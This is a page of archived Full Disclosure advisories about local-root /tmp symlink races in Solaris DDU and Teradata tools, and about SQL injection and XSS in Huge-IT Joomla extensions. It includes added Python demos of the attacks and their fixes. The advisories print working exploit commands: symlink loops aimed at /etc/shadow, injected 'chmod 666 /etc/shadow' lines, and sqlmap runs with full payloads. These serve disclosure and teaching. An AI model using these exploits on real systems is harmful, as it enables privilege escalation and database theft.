[FD] Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 leads to root

2020-07-14 Thread Larry W. Cashdollar via Fulldisclosure
Title: Insecure /tmp file use in Oracle Solaris 11 Device Driver Utility v1.3.1 
leads to root

Author: Larry W. Cashdollar, @_larry0

Date: 2020-02-02

CVE-2020-14724

Download Site: https://docs.oracle.com/cd/E37838_01/html/E69250/useddu.html

Vendor: Oracle, fixed in the July 14 2020 CPU 
https://www.oracle.com/security-alerts/cpujul2020.html

Vendor Notified: 2020-02-02

Vendor Contact: secalert...@oracle.com

Advisory: http://www.vapidlabs.com/advisory.php?v=212

Description: "The Device Driver Utility provides information about the devices 
on your installed system and the drivers that manage those devices. The DDU 
reports whether the currently booted operating system has drivers for all of 
the devices that are detected in your system. If a device does not have a 
driver attached, the Device Driver Utility recommends a driver package to 
install."

Vulnerability:

Append contents of ddu_log to system files via symlink attack: 

In ./ddu-text/utils/ddu-text.py 

18 LOG_LOCATION = "/tmp/ddu_log"

45: print _("Exiting Text Installer. Log is available at:\n%s") % LOG_LOCATION 

50: logging.basicConfig(filename=LOG_LOCATION, level=LOG_LEVEL, 

Elevation of privileges via symlink attack due to a chmod operation on a /tmp 
file: 

In file ./ddu-text/utils/inner_window.py 

667: logfile = open('/tmp/ddu_err.log', 'a') 

695: logfile = open('/tmp/ddu_err.log', 'a') 

721: logfile = open('/tmp/ddu_err.log', 'a') 

748: logfile = open('/tmp/ddu_err.log', 'a') 

In file ./scripts/comp_lookup.sh 

33:typeset err_log=/tmp/ddu_err.log 

In file ./scripts/det_info.sh 

38:typeset err_log=/tmp/ddu_err.log 

In file ./scripts/pkg_relate.sh 

449:typeset err_log=/tmp/ddu_err.log 

In file ./scripts/find_media.sh 

20:typeset err_log=/tmp/ddu_err.log 

There is a race condition here between the existence check/file creation and 
the chmod 666: a local user can run a simple loop that re-creates the symlink 
as soon as the ddu_err.log file is removed, so the chmod is applied to the 
symlink's target: 

In file ./scripts/probe.sh 569: 

# Make /tmp/ddu_err.log writable for every user 

571: if [ -f /tmp/ddu_err.log ]; then 

572: pfexec chmod 666 /tmp/ddu_err.log 

574: touch /tmp/ddu_err.log; chmod 666 /tmp/ddu_err.log 

636:typeset err_log=/tmp/ddu_err.log 

These are also potential file-clobbering issues, from probe.sh: 

131: NIC_info_file=/tmp/dvt_network_info_file 

133: temp_file=/tmp/dvt_network_temp 

134: temp_file_2=/tmp/dvt_network_temp_2 

207: c_file=/tmp/str_ctrl_file 

208: c_file1=/tmp/str_ctrl_file_1 

209: c_file2=/tmp/str_ctrl_file_2 

210: c_file3=/tmp/str_ctrl_file_3 

211: c_file4=/tmp/str_ctrl_file_4 

212: c_file5=/tmp/str_ctrl_file_5 

328: dvt_cd_dev_tmpfile=/tmp/dvt_cd_dev_tmpfile 

329: dvt_cd_ctl_tmpfile=/tmp/dvt_cd_ctl_tmpfile 

330: dvt_cd_ctl_tmpfile1=/tmp/dvt_cd_ctl_tmpfile1 

398: temp_file1=/tmp/dvt_tmp_file1 

399: temp_file2=/tmp/dvt_tmp_file2 

462: cpu_tmpfile=/tmp/cpu_tmpfile 

490: memory_tmpfile=/tmp/memory_tmpfile 

624:typeset ctl_file=/tmp/dvt_ctl_file

 

Exploit Code:

Tested on Solaris 11 x86:

larry@SolSun:~$ uname -a
SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc

and on OpenIndiana:

root@openindiana:/export/home/larry# uname -a
SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc

Append content to /etc/passwd:

larry@openindiana:/tmp$ ln -s /etc/passwd ddu_log

To get local root, simply have ddu chmod 666 /etc/shadow:

larry@openindiana:/tmp$ while true; do ln -s /etc/shadow ddu_err.log; done

A better exploit:

https://github.com/lcashdol/Exploits/tree/master/ddu-exploit

Patches to OpenIndiana

https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0

2017-03-02 Thread Larry W. Cashdollar
Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 
3.0
Vulnerability Date: 2017-02-27
Download: https://wordpress.org/plugins/zen-mobile-app-native/
Vendor: https://profiles.wordpress.org/zendkmobileapp/
Notified: 2017-02-27
Description: Mobile App WordPress plugin lets you turn your website into a 
full-featured mobile application in minutes using Mobile App Builder.
Vulnerability: The code in file ./zen-mobile-app-native/server/images.php 
doesn't require authentication or check that the user is allowed to upload 
content.
It also doesn't sanitize the file upload against executable code.

http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php
http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php

https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh

URL: http://www.vapidlabs.com/advisory.php?v=178
Credit: Larry W. Cashdollar, @_larry0

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Re: [FD] Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin

2016-11-20 Thread Larry W. Cashdollar
Hello All,

These are really great advisories, my only wish is that they were copied to the 
security lists in their entirety.  This way we aren't relying on a single point 
of failure (your website) when looking for the data in the future.

Thanks!
Larry

> On Nov 19, 2016, at 5:48 AM, Summer of Pwnage  wrote:
> 
> 
> Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin
> 
> Yorick Koster, July 2016
> 
> 
> Abstract
> 
> A Cross-Site Scripting vulnerability was found in the WP Canvas -
> Shortcodes WordPress Plugin. This issue allows an attacker to perform a
> wide variety of actions, such as stealing Administrators' session
> tokens, or performing arbitrary actions on their behalf. This issue can
> be exploited by authenticated users with the Contributor or higher role.
> 
> 
> OVE ID
> 
> OVE-20160724-0031
> 
> 
> Tested versions
> 
> This issue was successfully tested on WP Canvas - Shortcodes WordPress
> Plugin version 1.92.
> 
> 
> Fix
> 
> This issue has been addressed in WP Canvas - Shortcodes WordPress Plugin
> version 2.07.
> 
> 
> Details
> 
> https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_in_wp_canvas___shortcodes_wordpress_plugin.html
> 
> 
> Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
> goal is to contribute to the security of popular, widely used OSS
> projects in a fun and educational way.
> 
> ___
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall

2016-11-18 Thread Larry W. Cashdollar
Title: /tmp race condition in Teradata Studio Express v15.12.00.00 
studioexpressinstall
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-03
Download Site: 
http://downloads.teradata.com/download/tools/teradata-studio-express
Vendor: Teradata
Vendor Notified: 2016-10-03
Vendor Contact: web form contact
Description: Teradata Studio Express provides an information discovery tool 
that retrieves data from Teradata Database systems and allows the data to be 
manipulated and stored on the desktop. It is built on the Eclipse Rich Client 
Platform (RCP). 
Vulnerability:
The installation script for TeradataStudioExpress.15.12.00.00 creates files in 
/tmp insecurely.  A malicious local user could create a symlink in /tmp and 
possibly clobber system files or perhaps elevate privileges.

$ grep -n "/tmp" studioexpressinstall 

33:ASKDIRFILE=/tmp/sqlajeaskdir
41:DEF_TRACEFILE=/tmp/studioexinstall.log
44:TMP=/tmp
72:SQLAJEINPUTS=/tmp/studioexinputs
90:RPM_OUT_FILE=/tmp/studioexinstall_rpmcmd.out
103:SQLAJEINSTALL=/tmp/studioexpressinstall
136:   java -version > "/tmp/javaver" 2>&1
137:   verstring=`grep "java version" /tmp/javaver`
143:  jre64b=`grep "64-Bit" /tmp/javaver`
212:rm -f /tmp/javaver 
341:   tmptracefile=/tmp/studioexinstall.log.tmp#Temporary trace file.
588:touch /tmp/checkstudioexinstall
603:rm -f /tmp/checkstudioexinstall
604:rm -f /tmp/studioexinstall_rpmcmd.out

CVE-ID: CVE-2016-7490
Exploit Code:
$ ln -s /etc/passwd /tmp/javaver
Advisory: http://www.vapidlabs.com/advisory.php?v=174

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp

2016-11-18 Thread Larry W. Cashdollar
Title: Teradata Virtual Machine Community Edition v15.10 Insecure creation of 
files in /tmp
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site: 
http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: web form contact
Description: Teradata is a relational database, they provide a Virtual Machine 
image for developers and community use.
Vulnerability:
 Teradata Virtual Machine Community Edition v15.10 Insecure creation of files 
in /tmp may lead to elevated code execution.
In /opt/teradata/gsctools/bin/t2a.pl

320 `chmod +x /tmp/$PROG.get_profile.scr ; /tmp/$PROG.get_profile.scr 
>/dev/null 2>&1` ;

If a regular user controls /tmp/t2a.pl.get_profile.scr before the person 
executing this script creates it, they can inject commands to be executed as 
that user.

for example:

$ while true; do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; 
done

If root or any other account runs that .pl script I see these files being 
created in /tmp

[C] -rw-r----- 1 root root 14  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd
[U] -rw-r----- 1 root root 14  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.cmd
[C] -rw-r----- 1 root root 0  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager
[C] -rw-r----- 1 root root 0  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr
[U] -rw-r----- 1 root root 44  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr
[U] -rw-r----- 1 root root 152  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager.stderr
[C] -rw-r----- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
[U] -rw-r----- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
[M] -rwxr-x--- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr


CVE-ID: CVE-2016-7489
Exploit Code:
$ while true; do echo "chmod 666 /etc/shadow" > /tmp/t2a.pl.get_profile.scr; 
done
Advisory: www.vapidlabs.com/advisory.php?v=173

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
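The three /tmp advisories so far on this page (DDU's chmod 666 on /tmp/ddu_err.log and its logger appending to /tmp/ddu_log, studioexpressinstall redirecting java -version into /tmp/javaver, and t2a.pl executing a script it wrote under a fixed name) share one root cause: a privileged process operates on a predictable name in a world-writable directory. The script below is an added example, not code from Oracle, Teradata or the advisories. It reproduces the naive pattern and the symlink attack inside a private scratch directory (the "shadow" victim file and its contents are constructed stand-ins), then shows the two fixes: an O_EXCL|O_NOFOLLOW open with fchmod() on the descriptor, and an unpredictable name from mkstemp() inside a mode-0700 mkdtemp() directory.

```python
"""Why a fixed /tmp name plus chmod()/append is exploitable, and the safe
pattern.  Added example; everything happens in a private scratch directory
with a constructed stand-in for /etc/shadow."""
import os
import stat
import tempfile


def naive_make_world_writable(path: str) -> None:
    """What probe.sh does: if the log exists chmod 666 it, else create it.
    Both isfile() and chmod() follow symlinks, so a link planted at `path`
    redirects the mode change to whatever the attacker pointed it at."""
    if os.path.isfile(path):
        os.chmod(path, 0o666)
    else:
        open(path, "a").close()
        os.chmod(path, 0o666)


def naive_append_log(path: str, line: str) -> None:
    """What logging.basicConfig(filename=...) / open(path, 'a') does:
    append through any symlink at `path`."""
    with open(path, "a") as fh:
        fh.write(line)


def safe_create(path: str, mode: int = 0o600) -> int:
    """Create `path` only if nothing is there.  O_EXCL makes a pre-planted
    file or symlink fail with EEXIST, O_NOFOLLOW refuses to follow a link
    on open, and the fstat() check confirms we got a plain file we own.
    Mode changes then go through fchmod() on the fd, never chmod() on the
    name, which would re-open the race."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, mode)
    st = os.fstat(fd)
    if not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid() or st.st_nlink != 1:
        os.close(fd)
        raise RuntimeError("unexpected object at %s" % path)
    os.fchmod(fd, mode)
    return fd


def private_tempfile(prefix: str = "ddu_") -> str:
    """The real fix: an unpredictable name inside a mode-0700 directory,
    created O_EXCL by mkstemp().  Nothing for an attacker to pre-create."""
    tmpdir = tempfile.mkdtemp(prefix=prefix)
    fd, path = tempfile.mkstemp(dir=tmpdir, prefix=prefix, suffix=".log")
    os.close(fd)
    return path


def run_demo() -> dict:
    """Plant the symlink the advisories describe, run the naive and safe code
    against it, and report what happened."""
    work = tempfile.mkdtemp(prefix="tmprace_")
    victim = os.path.join(work, "shadow")        # stand-in for /etc/shadow
    link = os.path.join(work, "ddu_err.log")     # the fixed /tmp name
    with open(victim, "w") as fh:
        fh.write("root:*:18000::::::\n")         # constructed content
    os.chmod(victim, 0o600)
    os.symlink(victim, link)                     # ln -s /etc/shadow /tmp/ddu_err.log

    naive_make_world_writable(link)              # the privileged probe.sh step
    mode_after_chmod = stat.S_IMODE(os.stat(victim).st_mode)
    naive_append_log(link, "larry::0:0::/:/bin/sh\n")   # the privileged logger
    with open(victim) as fh:
        victim_contents = fh.read()

    try:
        safe_create(link)
        safe_refused = False
    except FileExistsError:
        safe_refused = True

    fd = safe_create(os.path.join(work, "fresh.log"))
    safe_mode = stat.S_IMODE(os.fstat(fd).st_mode)
    os.close(fd)
    private_dir_mode = stat.S_IMODE(os.stat(os.path.dirname(private_tempfile())).st_mode)
    return {
        "mode_after_chmod": mode_after_chmod,    # 0o666: chmod followed the link
        "victim_contents": victim_contents,      # attacker's line was appended
        "safe_refused": safe_refused,            # True: O_EXCL saw the link
        "safe_mode": safe_mode,                  # 0o600
        "private_dir_mode": private_dir_mode,    # 0o700
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, oct(value) if isinstance(value, int) else repr(value))
```

run_demo() shows what the attacker gains from the naive code (the victim's mode flips to 0666 and the planted line lands in it) and that safe_create() refuses the planted symlink. The same open(2) flags exist on Solaris and illumos; the better fix for a privileged tool is not to keep its log in /tmp at all.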

[FD] Teradata Virtual Machine Community Edition v15.10 has insecure file permission

2016-11-10 Thread Larry W. Cashdollar
Title: Teradata Virtual Machine Community Edition v15.10 has insecure file 
permission
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site: 
http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: webform contact
Description: A database appliance for virtual machine environments.
Vulnerability:
Teradata Virtual Machine Community Edition v15.10 has insecure file permissions 
on /etc/luminex/pkgmgr. These could allow a local user to modify its contents 
and execute commands as root.

TVME:/ # ls -ld /etc/luminex/
drwxrwxrwx 2 root root 4096 Mar 3 2016 /etc/luminex/
TVME:/# ls -l /etc/luminex/
total 128
-rwxrwxrwx 1 root root 24576 Mar 3 2016 packages.db
-rwxrwxrwx 1 root root 102357 Mar 3 2016 pkgmgr

CVE: CVE-2016-7488
Exploit Code:
$ echo "#!/bin/bash" > /etc/luminex/pkgmgr
$ echo "chmod 666 /etc/shadow" >> /etc/luminex/pkgmgr
$ chmod 755 /etc/luminex/pkgmgr

Advisory: http://www.vapidlabs.com/advisory.php?v=172

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6

2016-09-30 Thread Larry W. Cashdollar
Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-portfolio-gallery/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description: Huge-IT Portfolio Gallery extension can do wonders with your 
website. If you wish to show your photos, videos, enclosing the additional 
images and videos, then this Portfolio Gallery extension is what you need.
Vulnerability:
The following lines allow unauthenticated users to perform SQL injection 
against the functions in ajax_url.php:

In file ajax_url.php:

  11 define('_JEXEC',1);
  12 defined('_JEXEC') or die('Restircted access');
.
.
.
  49 $page = $_POST["page"];
  50 $num=$_POST['perpage'];
  51 $start = $page * $num - $num;
  52 $idofgallery=$_POST['galleryid'];
  53 $level = $_POST['level'];
  54 $query = $db->getQuery(true);
  55 $query->select('*');
  56 $query->from('#__huge_itportfolio_images');
  57 $query->where('portfolio_id ='.$idofgallery);
  58 $query ->order('#__huge_itportfolio_images.ordering asc');
  59 $db->setQuery($query,$start,$num);

CVE-2016-1000124
Exploit Code:
$ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' 
--data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&level=2" 
--level=5 --risk=3

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the 
others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 2870 
HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: page=1&galleryid=-2264 OR 1 GROUP BY 
CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 
END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING 
MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&level=2

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) 
ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&level=2
---
[13:30:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[13:30:39] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2715 times
[13:30:39] [INFO] fetched data logged to text files under 
'/home/larry/.sqlmap/output/192.168.0.4'

[*] shutting down at 13:30:39
Advisory: http://www.vapidlabs.com/advisory.php?v=170

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla

2016-09-28 Thread Larry W. Cashdollar
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-catalog/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com
Description: 
Huge-IT Product Catalog is made for demonstration, sale, advertisements for 
your products. Imagine a stand with a 
variety of catalogs with a specific product category. To imagine is not 
difficult, to use is even easier.

Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL 
into functions via 'load_more_elements_into_catalog' located in ajax_url.php. 

Vulnerable Code in : ajax_url.php

 11 define('_JEXEC', 1);
 12 defined('_JEXEC') or die('Restircted access');
.
.
.
308 } elseif ($_POST["post"] == "load_more_elements_into_catalog") {
309 $catalog_id = $_POST["catalog_id"];
310 $old_count = $_POST["old_count"];
311 $count_into_page = $_POST["count_into_page"];
312 $show_thumbs = $_POST["show_thumbs"];
313 $show_description = $_POST["show_description"];
314 $show_linkbutton = $_POST["show_linkbutton"];
315 $parmalink = $_POST["parmalink"];
316 $level = $_POST['level'];
.
.
.
359 $query->select('*');
360 $query->from('#__huge_it_catalog_products');
361 $query->where('catalog_id =' . $catalog_id);
362 $query->order('ordering asc');
363 $db->setQuery($query, $from, $count_into_page);

CVE-2016-1000125
Exploit Code:
$ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' 
--data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&level=*" 
--level=5 --risk=3

Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY 
CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 
END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING 
MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&level=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN 
(7371=7371) THEN SLEEP(5) ELSE 7371 
END)&old_count=&count_into_page=&show_thumbs=&show_description=&level=

    Type: UNION query
    Title: Generic UNION query (random number) - 15 columns
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL 
SELECT 
2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- 
FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&level=
---
[16:48:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[16:48:10] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 6637 times
[16:48:10] [INFO] fetched data logged to text files under 
'/home/larry/.sqlmap/output/example.com'

[*] shutting down at 16:48:10

Advisory: http://www.vapidlabs.com/advisory.php?v=171

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] XSS and SQLi in huge IT gallery v1.1.5 for Joomla

2016-07-25 Thread Larry W. Cashdollar

Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Fixed: v1.1.7
Author: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva
Date: 2016-07-14
Download Site: 
http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro
Vendor: huge-it.com
Vendor Notified: 2016-07-15, fixed 2016-07-23
Vendor Contact: i...@huge-it.com
Description: The plugin allows you to add multiple images to the gallery, 
create countless galleries, add a description to each of them, as well as make 
the same things with video links.
Vulnerability:
The attacker must be logged in with at least manager level access or access to 
the administrative panel to exploit this vulnerability:

SQL in code via id parameter:
./administrator/components/com_gallery/models/gallery.php
51 public function getPropertie() {
52 $db = JFactory::getDBO();
53 $id_cat = JRequest::getVar('id');
54 $query = $db->getQuery(true);
55 $query->select('#__huge_itgallery_images.name as name,'
56 . '#__huge_itgallery_images.id ,'
57 . '#__huge_itgallery_gallerys.name as portName,'
58 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itgallery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');
59 $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itgallery_images'));
60 $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat);
61 $query->order('ordering desc');
62 
64 $db->setQuery($query);
65 $results = $db->loadObjectList();
66 return $results;
67 }



XSS is here:

root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} 
\;
./administrator/components/com_gallery/views/gallery/tmpl/default.php
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} 
\;
256: 
CVE Assignments: CVE-2016-1000113 XSS, CVE-2016-1000114 SQL Injection
Exploit Code:
XSS PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E

SQLi PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE

$ sqlmap --load-cookies=cookies.txt -u 
"http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" 
--dbms mysql
Advisory: http://www.vapidlabs.com/advisory.php?v=164

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
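All three Huge-IT advisories on this page come down to the same line: an integer meant for a WHERE clause ('portfolio_id =', 'catalog_id =', 'gallery_id=') is concatenated straight from the request into the query text, and Joomla's query builder does nothing to stop it. The following is an added example, not the extensions' code: it rebuilds the vulnerable query against an in-memory SQLite table with constructed rows (the images table, plus a jos_users table whose name and contents are assumed here purely to give a UNION something to dump) and runs the OR and UNION forms of the payloads sqlmap reported, next to the two fixes, a cast to int and a bound parameter. sqlmap's error-based and time-based payloads depend on MySQL's FLOOR(RAND()) and SLEEP(), so they are not replayed.

```python
"""Replays the Huge-IT injection point against an in-memory SQLite table and
shows the fixes.  Added example, not the extensions' code; the tables and
rows are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema: the images table the query reads, plus a users
    table a UNION can reach because the DB account can read it."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE huge_itportfolio_images (id INTEGER, portfolio_id INTEGER, name TEXT);
        INSERT INTO huge_itportfolio_images VALUES (1, 1, 'public-a'), (2, 1, 'public-b'),
                                                   (3, 2, 'unpublished');
        CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO jos_users VALUES (42, 'admin', '$2y$10$constructedhash');
    """)
    return con


def images_vulnerable(con, idofgallery: str) -> list:
    """Mirrors $query->where('portfolio_id ='.$idofgallery): the request value
    is pasted into the SQL text, so operators and a UNION ride along."""
    sql = ("SELECT * FROM huge_itportfolio_images WHERE portfolio_id ="
           + idofgallery + " ORDER BY id ASC")
    return con.execute(sql).fetchall()


def images_cast(con, idofgallery: str) -> list:
    """Fix 1, the usual Joomla idiom (int) $id: make the value an integer
    before it touches the query; '1 OR 1=1' raises instead of running."""
    gallery_id = int(idofgallery)
    sql = ("SELECT * FROM huge_itportfolio_images WHERE portfolio_id = %d "
           "ORDER BY id ASC" % gallery_id)
    return con.execute(sql).fetchall()


def images_bound(con, idofgallery: str) -> list:
    """Fix 2: bind the value.  The driver sends it as data, never as SQL, so
    this also covers string columns where a cast is not an option."""
    return con.execute(
        "SELECT * FROM huge_itportfolio_images WHERE portfolio_id = ? ORDER BY id ASC",
        (idofgallery,),
    ).fetchall()


def run_demo() -> dict:
    """Legitimate request, the two payload shapes, and both fixes."""
    con = make_db()
    results = {
        "legitimate": images_vulnerable(con, "1"),
        "or_payload": images_vulnerable(con, "1 OR 1=1"),          # every gallery's rows
        "union_payload": images_vulnerable(
            con, "-1 UNION SELECT id, id, password FROM jos_users"),  # dumps the hash
        "bound": images_bound(con, "1 OR 1=1"),                    # no rows: compared as data
    }
    try:
        images_cast(con, "1 OR 1=1")
        results["cast_rejected"] = False
    except ValueError:
        results["cast_rejected"] = True
    return results


if __name__ == "__main__":
    for key, rows in run_demo().items():
        print(key, rows)
```

The cast is enough for these three endpoints because every injected value is numeric; the powerplay gallery INSERT further down this page also interpolates a free-text 'name', which only binding (or $wpdb->prepare() in WordPress) handles safely.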

[FD] Local root vulnerability in DeleGate v9.9.13

2015-12-29 Thread Larry W. Cashdollar

Title: Local root vulnerability in DeleGate v9.9.13
Author: Larry W. Cashdollar, @_larry0
Date: 2015-12-17
Advisory: http://www.vapidlabs.com/advisory.php?v=159
Download Sites: http://delegate.hpcc.jp/delegate/ 
http://delegate.org/delegate/

Vendor: National Institute of Advanced Industrial Science and Technology
Vendor Notified: 2015-12-17
Vendor Contact: y.s...@delegate.org ys...@etl.go.jp
Description: DeleGate is a multipurpose proxy server which relays 
various application protocols on TCP/IP or UDP/IP, including HTTP, FTP, 
Telnet, NNTP, SMTP, POP, IMAP, LPR, LDAP, ICP, DNS, SSL, Socks, and 
more. DeleGate mediates communication between servers and clients where 
direct communication is impossible, inefficient, or inconvenient.


Vulnerability:
Installation of delegate 9.9.13 sets some binaries setuid root, at least 
one of these binaries can be used to escalate the privileges of a local 
user.  The binary dgcpnod creates a node allowing a local unprivileged 
user to create files anywhere on disk.   By creating a file in 
/etc/cron.hourly a local user can execute commands as root.


Installing the software from source or from the binary distribution, with 
the option of not running it as root, runs a script, setup-subin.sh, that 
sets the setuid bit on four binaries.  In Linux distributions where this 
software is part of the package list these binaries are not setuid root 
(Arch Linux, for example).


From the documentation http://www.delegate.org/delegate/newbies-ja.shtml 
(translated to English):
Put the DGROOT directory that is included in the binary distribution, or 
that you built from source, wherever you prefer, and rename it if 
necessary. This is the DgRoot. Likewise, if needed, you can rename the 
DeleGate executable to whatever you prefer. This is the DgExe.
"If you want to use subin in the Unix version (such as when using a 
privileged port), do the following.

  (3-2uk) $ cd DgRoot/subin
          $ sh setup-subin.sh"

larry@f4ult:~/dg9_9_13/DGROOT/subin$ ls -l
total 1916
-r-sr-s--- 1 root  larry 384114 Oct 31  2014 dgbind
-r-sr-s--- 1 root  larry 384598 Oct 31  2014 dgchroot
-r-sr-s--- 1 root  larry 384161 Oct 31  2014 dgcpnod
